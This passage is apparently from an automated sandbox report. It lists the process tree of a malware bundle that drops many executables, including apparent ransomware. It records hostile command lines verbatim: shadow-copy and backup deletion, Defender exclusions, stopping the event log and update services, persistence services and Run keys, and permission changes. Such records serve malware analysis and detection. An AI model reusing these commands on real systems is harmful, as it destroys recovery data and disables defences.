        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ROULLE~1.EXE
        5⤵
        
        PID:7388
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe"
      4⤵
      PID:6296
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe
        5⤵
        
        PID:8164
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe
        6⤵
        
        PID:5432
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 0
        7⤵
        
        PID:2140
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe"
      4⤵
      PID:6200
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
        5⤵
        
        PID:3592
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pilgzi.exe"
      4⤵
      PID:7904
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pilgzi.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pilgzi.exe
        5⤵
        
        PID:6464
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Cvdnacb.exe"
      4⤵
      PID:4560
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Cvdnacb.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Cvdnacb.exe
        5⤵
        
        PID:6524
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dais123.exe"
      4⤵
      PID:5408
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dais123.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dais123.exe
        5⤵
        
        PID:3740
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe"
      4⤵
      PID:4928
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe
        5⤵
        
        PID:608
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe"
      4⤵
      PID:6120
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe
        5⤵
        
        PID:6432
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MARTIN~1.EXE"
      4⤵
      PID:1084
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MARTIN~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MARTIN~1.EXE
        5⤵
        
        PID:6652
      - C:\Windows\system32\svchost.exe
        
        C:\Windows\system32\svchost.exe -k
        6⤵
        
        PID:1552
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1234.exe"
      4⤵
      PID:6080
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1234.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1234.exe
        5⤵
        
        PID:6396
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\klounada.exe"
      4⤵
      PID:5368
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\klounada.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\klounada.exe
        5⤵
        
        PID:8052
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe"
      4⤵
      PID:4560
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\blue2_A1.exe
        5⤵
        
        PID:5188
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe"
      4⤵
      PID:1600
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe
        5⤵
        
        PID:6740
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U5780~1.EXE"
        6⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\U5780~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U5780~1.EXE
        7⤵
        
        PID:7840
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7840 -s 1016
        8⤵
        Program crash
        
        PID:5052
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U5781~1.EXE"
        6⤵
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\U5781~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U5781~1.EXE
        7⤵
        
        PID:6560
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 1160
        6⤵
        Program crash
        
        PID:4820
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE"
      4⤵
      PID:6792
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE
        5⤵
        
        PID:5056
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5008
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\123p.exe"
      4⤵
      PID:6888
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\123p.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\123p.exe
        5⤵
        
        PID:6476
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        
        PID:5736
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        
        PID:6448
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        
        PID:5196
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        
        PID:5548
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OBGPQMHF"
        6⤵
        Launches sc.exe
        
        PID:5308
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:7600
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:2320
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OBGPQMHF"
        6⤵
        Launches sc.exe
        
        PID:2332
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe"
      4⤵
      PID:4208
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
        5⤵
        
        PID:3472
      - C:\Users\Admin\AppData\Local\Temp\98163614.exe
        
        C:\Users\Admin\AppData\Local\Temp\98163614.exe
        6⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\134604888.exe
        
        C:\Users\Admin\AppData\Local\Temp\134604888.exe
        7⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\2715028339.exe
        
        C:\Users\Admin\AppData\Local\Temp\2715028339.exe
        8⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\197123061.exe
        
        C:\Users\Admin\AppData\Local\Temp\197123061.exe
        8⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\2078513053.exe
        
        C:\Users\Admin\AppData\Local\Temp\2078513053.exe
        8⤵
        
        PID:7912
        
        C:\Users\Admin\AppData\Local\Temp\184103646.exe
        
        C:\Users\Admin\AppData\Local\Temp\184103646.exe
        8⤵
        
        PID:5884
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c shutdown /r
        9⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c shutdown /r
        10⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\3125214958.exe
        
        C:\Users\Admin\AppData\Local\Temp\3125214958.exe
        8⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\1052024575.exe
        
        C:\Users\Admin\AppData\Local\Temp\1052024575.exe
        7⤵
        
        PID:7892
        
        C:\Users\Admin\AppData\Local\Temp\171141900.exe
        
        C:\Users\Admin\AppData\Local\Temp\171141900.exe
        7⤵
        
        PID:620
        
        C:\Users\Admin\AppData\Local\Temp\270991267.exe
        
        C:\Users\Admin\AppData\Local\Temp\270991267.exe
        7⤵
        
        PID:7500
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c shutdown /r
        8⤵
        
        PID:7728
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c shutdown /r
        9⤵
        
        PID:6744
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TOOLSP~1.EXE"
      4⤵
      PID:384
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TOOLSP~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TOOLSP~1.EXE
        5⤵
        
        PID:4580
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\123.exe"
      4⤵
      PID:6676
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\123.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\123.exe
        5⤵
        
        PID:5176
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiii.exe"
      4⤵
      PID:7140
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiii.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiii.exe
        5⤵
        
        PID:4864
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4340
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pei.exe"
      4⤵
      PID:6760
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pei.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pei.exe
        5⤵
        
        PID:4296
      - C:\Users\Admin\AppData\Local\Temp\1882616696.exe
        
        C:\Users\Admin\AppData\Local\Temp\1882616696.exe
        6⤵
        
        PID:6280
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wr.exe"
      4⤵
      PID:7728
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wr.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wr.exe
        5⤵
        
        PID:7084
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\BROOMS~1.EXE"
      4⤵
      PID:7584
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\BROOMS~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\BROOMS~1.EXE
        5⤵
        
        PID:7012
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe"
      4⤵
      PID:1108
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe
        5⤵
        
        PID:3692
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        
        PID:2404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:7796
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:4924
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:5724
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:5972
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:4688
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:5008
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:1156
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        
        PID:408
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        
        PID:2456
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        
        PID:6952
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        
        PID:4388
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        6⤵
        Launches sc.exe
        
        PID:4048
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:1620
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:1524
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        6⤵
        Launches sc.exe
        
        PID:796
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\new1.exe"
      4⤵
      PID:3304
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\new1.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\new1.exe
        5⤵
        
        PID:3364
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USA123.exe"
      4⤵
      PID:7600
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USA123.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USA123.exe
        5⤵
        
        PID:7732
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\first.exe"
      4⤵
      PID:4696
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\first.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\first.exe
        5⤵
        
        PID:5736
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CAYV0D~1.EXE"
      4⤵
      PID:6268
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CAYV0D~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CAYV0D~1.EXE
        5⤵
        
        PID:296
      - C:\Windows\SysWOW64\clip.exe
        
        "C:\Windows\SysWOW64\clip.exe"
        6⤵
        
        PID:3656
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE"
      4⤵
      PID:4060
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE
        5⤵
        
        PID:5988
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\sleep.exe"
      4⤵
      PID:8160
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\sleep.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\sleep.exe
        5⤵
        
        PID:7744
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SADFBS~1.EXE"
      4⤵
      PID:556
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SADFBS~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SADFBS~1.EXE
        5⤵
        
        PID:6664
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE"
      4⤵
      PID:7880
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE
        5⤵
        
        PID:3936
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe"
      4⤵
      PID:4640
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe
        5⤵
        
        PID:3172
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Tdkdsxz.exe"
      4⤵
      PID:5532
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Tdkdsxz.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Tdkdsxz.exe
        5⤵
        
        PID:7804
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
    "bot.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3448
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
      4⤵
      Executes dropped EXE
      PID:3120
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
        5⤵
        
        PID:1940
      - C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        6⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        7⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        8⤵
        
        PID:3688
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        9⤵
        
        PID:5780
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5780 CREDAT:17410 /prefetch:2
        10⤵
        
        PID:5160
        
        C:\Program Files (x86)\Microsoft\DesktopLayer.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
        8⤵
        
        PID:5376
        
        C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
        9⤵
        
        PID:4336
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        10⤵
        
        PID:1544
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1544 CREDAT:17410 /prefetch:2
        11⤵
        
        PID:5492
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        9⤵
        
        PID:2004
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:17410 /prefetch:2
        10⤵
        
        PID:416
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\DA0F.tmp\splitterrypted.vbs
        7⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\DA0F.tmp\splitterrypted.vbs
        8⤵
        
        PID:2788
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
        5⤵
        
        PID:4936
      - C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        6⤵
        
        PID:6076
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\DA3E.tmp\spwak.vbs
        7⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\DA3E.tmp\spwak.vbs
        8⤵
        
        PID:3956
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:2552
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall reset
      4⤵
      Modifies Windows Firewall
      PID:1672
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___Z2MAXI_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:8116
  - - C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___I8KMSU6_.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:4964
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
      4⤵
      PID:8068
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
        5⤵
        
        PID:6656
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im E
        6⤵
        Kills process with taskkill
        
        PID:7152
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:8048
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    PID:4624
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3400
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      4⤵
      Views/modifies file attributes
      PID:912
  - - C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:3412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 35501712738560.bat
      4⤵
      PID:912
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe //nologo m.vbs
        5⤵
        
        PID:4448
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s F:\$RECYCLE
      4⤵
      Views/modifies file attributes
      PID:5620
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4344
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6484
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6452
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected] co
      4⤵
      PID:3620
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b @[email protected] vs
      4⤵
      PID:7308
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
        
        @[email protected] vs
        5⤵
        
        PID:7972
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        6⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        
        PID:3784
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7132
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ipfnigovuw360" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
      4⤵
      PID:5376
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ipfnigovuw360" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
        5⤵
        Modifies registry key
        
        PID:5900
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6576
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:8164
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6336
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6184
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:620
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5748
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
